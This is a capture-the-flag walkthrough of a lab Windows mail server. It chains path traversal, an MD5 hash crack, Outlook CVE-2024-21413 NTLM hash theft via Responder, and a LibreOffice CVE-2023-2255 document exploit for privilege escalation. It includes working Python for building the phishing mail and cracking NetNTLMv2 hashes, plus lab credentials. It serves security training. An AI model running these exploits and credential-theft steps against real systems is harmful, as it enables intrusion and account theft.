User.txt
Let’s discover the open ports with nmap
sudo nmap -sS -sV --min-rate 5000 -n -Pn -T4 -vv 10.10.11.14
Output
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
110/tcp open pop3 syn-ack ttl 127 hMailServer pop3d
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 127 hMailServer imapd
445/tcp open microsoft-ds? syn-ack ttl 127
465/tcp open ssl/smtp syn-ack ttl 127 hMailServer smtpd
587/tcp open smtp syn-ack ttl 127 hMailServer smtpd
993/tcp open ssl/imap syn-ack ttl 127 hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Let’s add the host to our /etc/hosts file (only tee needs sudo; a leading sudo echo adds nothing)
echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
Now we will do some enumeration.
I found an LFI (path traversal) in the web application's download function: the file parameter is handed to the filesystem unsanitised, so ../ sequences read arbitrary files. The Windows hosts file is a good first probe because it exists on every install:
http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
The same traversal reads hMailServer's configuration file (hMailServer.INI, which lives in the Bin folder under the ProgramFolder shown below):
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
The AdministratorPassword value is an unsalted MD5 of the hMailServer administrator password (32 hex characters, no salt), so it cracks quickly offline with a wordlist (hashcat -m 0). After cracking it, the password is
homenetworkingadministrator
Let’s verify it by logging in to the POP3 service (port 110) via telnet; the same password turns out to be reused for the administrator@mailing.htb mailbox:
telnet 10.10.11.14 110
USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)
A mail server with a live recipient mailbox (maya@mailing.htb) suggests a client-side attack against whoever reads the mail. I remembered the well-known Outlook vulnerability CVE-2024-21413 (MonikerLink): a file:// hyperlink whose target ends in an exclamation mark is parsed by Outlook as a COM moniker instead of a normal link, which bypasses Protected View and makes Outlook resolve the referenced UNC path over SMB with the reader's NTLM credentials, leaking a NetNTLMv2 hash. I tried it with a public Python PoC script (CVE-2024-21413.py).
Start Responder on the VPN interface to catch the authentication, then send the mail with the cracked credentials (replace IP with your tun0 address; the PoC embeds that UNC path in the link):
sudo responder -I tun0
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\IP' --subject test123
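What the PoC sends, as an added example written for this write-up (it is not the CVE-2024-21413.py script above): it builds the mail with a moniker-style file:// link and can submit it over port 587 with the cracked account. The share and item names in the link, the attacker address 10.10.14.5 and the optional STARTTLS step are assumptions, not values from the page.

```python
"""Added example for this write-up, not the page's CVE-2024-21413.py PoC.

CVE-2024-21413 ("MonikerLink"): a file:// hyperlink whose target ends in
"!<text>" is parsed by Outlook as a COM moniker instead of a plain link, so
the usual file:// protections do not apply. Resolving it makes Outlook reach
the UNC host over SMB and authenticate with the reader's NTLM credentials,
which Responder captures as a NetNTLMv2 hash.
"""
import smtplib
from email.message import EmailMessage


def build_moniker_link(unc_host: str, share: str = "test", item: str = "meeting") -> str:
    """file://<host>/<share>/<item>!<anything>; the trailing '!' part is the trigger.
    Share and item names are arbitrary (assumed here); the host must be the listener."""
    return f"file://{unc_host}/{share}/{item}!exploit"


def build_message(sender: str, recipient: str, subject: str, unc_host: str) -> EmailMessage:
    """Multipart/alternative mail: plain text for non-HTML clients, HTML carrying the link."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    link = build_moniker_link(unc_host)
    msg.set_content("Please open the meeting notes on the shared drive.")
    msg.add_alternative(
        f'<html><body><p>Please open the <a href="{link}">meeting notes</a>.</p></body></html>',
        subtype="html",
    )
    return msg


def html_link_target(msg: EmailMessage) -> str:
    """Return the href of the HTML part (to check what was actually generated)."""
    html = msg.get_body(preferencelist=("html",)).get_content()
    start = html.index('href="') + len('href="')
    return html[start:html.index('"', start)]


def send(msg: EmailMessage, server: str, port: int, username: str, password: str) -> None:
    """Submit through the compromised account on the submission port (587)."""
    with smtplib.SMTP(server, port, timeout=15) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):  # hMailServer may or may not offer it on 587 (assumption)
            smtp.starttls()
            smtp.ehlo()
        smtp.login(username, password)
        smtp.send_message(msg)


if __name__ == "__main__":
    # 10.10.14.5 stands in for the attacker's tun0 address (assumed).
    mail = build_message("administrator@mailing.htb", "maya@mailing.htb", "test123", "10.10.14.5")
    print(mail.as_string())
    # send(mail, "mailing.htb", 587, "administrator@mailing.htb", "homenetworkingadministrator")
```

The plain-text part matters: without it some clients and filters treat a single HTML part as suspicious, and the link only has to be rendered, not clicked, for Outlook to start resolving the moniker in the vulnerable versions.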
When maya's Outlook processes the link it authenticates to our SMB listener, and Responder captures her NetNTLMv2 hash:
maya::MAILING:dac4fe0aec512cc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
It's a NetNTLMv2 hash (hashcat -m 5600, or john --format=netntlmv2), so we crack it offline with a wordlist:
maya:m4y4ngs4ri
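The two offline cracks above (the MD5 AdministratorPassword from hMailServer.INI and maya's NetNTLMv2 capture) are normally handed to hashcat; this added example, written for this write-up and not taken from the page or from hashcat/john, shows what those tools verify for each candidate word. The capture line format user::DOMAIN:challenge:proof:blob is Responder's real one, but the wordlist, the 8-byte challenge and the blob used in the demo are constructed, and the real capture from the page is not reproduced.

```python
"""Added example for this write-up, not code from the page or from hashcat/john.

What an offline dictionary check computes for the two hashes recovered above:
  * hMailServer AdministratorPassword: unsalted MD5 of the password (hashcat -m 0).
  * Responder NetNTLMv2 line (hashcat -m 5600):  user::DOMAIN:challenge:proof:blob
      NT      = MD4(UTF-16LE(password))
      NTOWFv2 = HMAC-MD5(NT, UTF-16LE(upper(user) + domain))
      proof   = HMAC-MD5(NTOWFv2, challenge || blob)
MD4 is implemented inline because hashlib.new("md4") is missing on many OpenSSL 3 builds.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: little-endian words, 64-byte blocks, three 16-step rounds."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rol((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def netntlmv2_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, challenge + blob, hashlib.md5).digest()


def make_responder_line(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a capture line in Responder's format (used here only to construct demo data)."""
    proof = netntlmv2_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_md5(target_hex: str, wordlist):
    target = target_hex.lower()
    for pw in wordlist:
        if hashlib.md5(pw.encode()).hexdigest() == target:
            return pw
    return None


def crack_netntlmv2(line: str, wordlist):
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    challenge, blob, target = bytes.fromhex(chal_hex), bytes.fromhex(blob_hex), bytes.fromhex(proof_hex)
    for pw in wordlist:
        if hmac.compare_digest(netntlmv2_proof(pw, user, domain, challenge, blob), target):
            return pw
    return None


# Constructed wordlist; a real run would stream rockyou.txt instead.
WORDLIST = ["password", "letmein", "m4y4ngs4ri", "homenetworkingadministrator"]

if __name__ == "__main__":
    print(crack_md5("841bb5acfa6779ae432fd7a4e6600ba7", WORDLIST))  # the hash from hMailServer.INI above
    # Constructed capture: made-up challenge and blob; the real Responder line is not reproduced.
    demo = make_responder_line("maya", "MAILING", "m4y4ngs4ri", bytes(range(8)), b"\x01\x01" + bytes(26))
    print(crack_netntlmv2(demo, WORDLIST))
```

The point of the two keyed steps is why NetNTLMv2 cracks slower than the raw MD5: each candidate costs one MD4 and two HMAC-MD5 computations, and the server challenge and blob tie the proof to this one capture, so precomputed tables are useless and the work has to be repeated per hash.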
maya can log in over WinRM, so we use evil-winrm:
evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
PS C:\Users\maya\Desktop> type user.txt
463996f3**********68581c
PS C:\Users\maya\Desktop>
And get the user.txt flag
Root.txt
Now it’s time for root
Enumerating installed software through the registry
reg query HKEY_LOCAL_MACHINE\SOFTWARE
shows a LibreOffice key, so LibreOffice is installed.
There is also a C:\Important Documents folder in the root of the drive. Any file I drop there is deleted about a minute later, which looks like a scheduled task picking up and opening documents from that folder, presumably as a more privileged user.
Combined with LibreOffice, that points at CVE-2023-2255: LibreOffice before 7.4.7 / 7.5.3 loads the contents of floating frames that link to external files without asking the user, and public PoCs turn that into command execution as soon as the document is opened.
Let’s clone this repo
git clone https://github.com/elweth-sec/CVE-2023-2255 && cd CVE-2023-2255
After trying several ways to get a reverse shell, I took the dirty way: make the payload copy the root flag into a text file that maya can read.
import subprocess

# "type" is a cmd.exe builtin, so shell=True is required. The task that opens the
# document can read localadmin's root.txt; append it to a file maya can read.
c = r'type C:\Users\localadmin\Desktop\root.txt >> C:\Users\maya\Documents\a.txt'
subprocess.run(c, shell=True)
Save this script as dirt.py and build the malicious document with the PoC, telling it to run the script when the document is opened:
python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\Documents\dirt.py' --output 'exploit.odt'
We have 2 files to upload. I copy them into /usr/share/evil-winrm/ so that a bare filename resolves in Evil-WinRM's upload command; passing the absolute local path to upload works too and avoids the copy.
sudo cp dirt.py /usr/share/evil-winrm/dirt.py
sudo cp exploit.odt /usr/share/evil-winrm/exploit.odt
Then in our Evil-WinRM session:
PS C:\Users\maya\Documents> upload dirt.py
PS C:\Users\maya\Documents> cd C:\
PS C:\> cd "C:/Important Documents/"
PS C:\Important Documents> upload exploit.odt
If a.txt does not appear in the Documents folder, re-upload the .odt file (the task consumes and deletes it) or reset the machine and try again.
Wait a moment for the scheduled task to open the document, then a.txt shows up:
PS C:\Important Documents> dir C:\Users\maya\Documents\
Directory: C:\Users\maya\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/13/2024 4:49 PM WindowsPowerShell
-a---- 5/5/2024 4:22 AM 34 a.txt
-a---- 4/11/2024 1:24 AM 807 mail.py
-a---- 3/14/2024 4:30 PM 557 mail.vbs
-a---- 5/5/2024 4:14 AM 594 dirt.py
Then
PS C:\Important Documents> cd C:\Users\maya\Documents\
PS C:\Users\maya\Documents> type a.txt
417aa94e*********10c153c430
PS C:\Users\maya\Documents>
We get the root.txt flag
I hope you found it useful (: